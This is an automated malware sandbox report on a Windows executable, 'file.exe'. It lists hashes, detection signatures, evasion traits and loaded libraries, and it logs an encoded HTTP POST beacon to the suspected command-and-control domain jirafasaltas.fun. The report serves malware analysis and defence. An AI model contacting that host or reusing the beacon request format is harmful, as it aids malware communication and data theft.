Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1500933
MD5: b7a66864aedc3fa7a4686498eaf2b251
SHA1: 045154b73c8c25e29c5db10d297d44e5371af940
SHA256: d51fbbda89b717b798dc784dbe3eb4aa151e9ef095c054e19368698fe923317e
Tags: exe
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 8% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability

Compliance
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.3820000.2.unpack
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: Binary string: ntdll.pdb source: file.exe, 00000000.00000002.2348716551.000000000462A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: file.exe, 00000000.00000002.2348716551.000000000462A000.00000004.00000020.00020000.00000000.sdmp
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: jirafasaltas.fun
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: jirafasaltas.fun
Source: unknown HTTP traffic detected: POST /shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: jirafasaltas.fun
Source: file.exe, 00000000.00000003.2329160540.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2342581353.0000000000D12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jirafasaltas.fun/:
Source: file.exe, 00000000.00000002.2343551941.0000000002AD7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2328751588.0000000000D24000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2342581353.0000000000D24000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2343551941.0000000002AE3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://jirafasaltas.fun/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHa
Source: file.exe, 00000000.00000002.2342409553.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jirafasaltas.fun:443/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpa
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F1135 0_2_033F1135
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F517A 0_2_033F517A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F776A 0_2_033F776A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F5766 0_2_033F5766
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F4FDF 0_2_033F4FDF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F1E12 0_2_033F1E12
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F1CB0 0_2_033F1CB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0340448A 0_2_0340448A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F20EA 0_2_033F20EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0348C6AA 0_2_0348C6AA
PE file contains more sections than normal
Source: file.exe Static PE information: Number of sections : 11 > 10
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.2149262379.00000000009E3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename1StepDVDCopy.exeB vs file.exe
Source: file.exe, 00000000.00000002.2348716551.00000000047A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
Source: file.exe, 00000000.00000002.2343092662.00000000028A5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe Binary or memory string: OriginalFilename1StepDVDCopy.exeB vs file.exe
Source: classification engine Classification label: mal60.evad.winEXE@1/0@1/1
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe Virustotal: Detection: 8%
Source: file.exe String found in binary or memory: NATS-SEFI-ADD
Source: file.exe String found in binary or memory: NATS-DANO-ADD
Source: file.exe String found in binary or memory: JIS_C6229-1984-b-add
Source: file.exe String found in binary or memory: jp-ocr-b-add
Source: file.exe String found in binary or memory: JIS_C6229-1984-hand-add
Source: file.exe String found in binary or memory: jp-ocr-hand-add
Source: file.exe String found in binary or memory: ISO_6937-2-add
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 8751104 > 1048576
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4c4000
Source: file.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x2a0400
Source: Binary string: ntdll.pdb source: file.exe, 00000000.00000002.2348716551.000000000462A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: file.exe, 00000000.00000002.2348716551.000000000462A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.3820000.2.unpack
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .didata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F4DC8 push esp; retf 0_2_033F4DC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F6640 push eax; ret 0_2_033F6649
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 64 Thread sleep time: -40880s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2548 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries keyboard layouts
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809 Jump to behavior
Source: file.exe, 00000000.00000003.2328751588.0000000000D42000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2342581353.0000000000D44000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2342409553.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Queries the installation date of Windows
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500933 Sample: file.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 60 10 jirafasaltas.fun 2->10 14 Multi AV Scanner detection for submitted file 2->14 16 AI detected suspicious sample 2->16 6 file.exe 2->6         started        signatures3 process4 dnsIp5 12 jirafasaltas.fun 188.114.96.3, 443, 49715 CLOUDFLARENETUS European Union 6->12 18 Detected unpacking (creates a PE file in dynamic memory) 6->18 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.96.3
 jirafasaltas.fun European Union
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
jirafasaltas.fun 188.114.96.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://jirafasaltas.fun/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown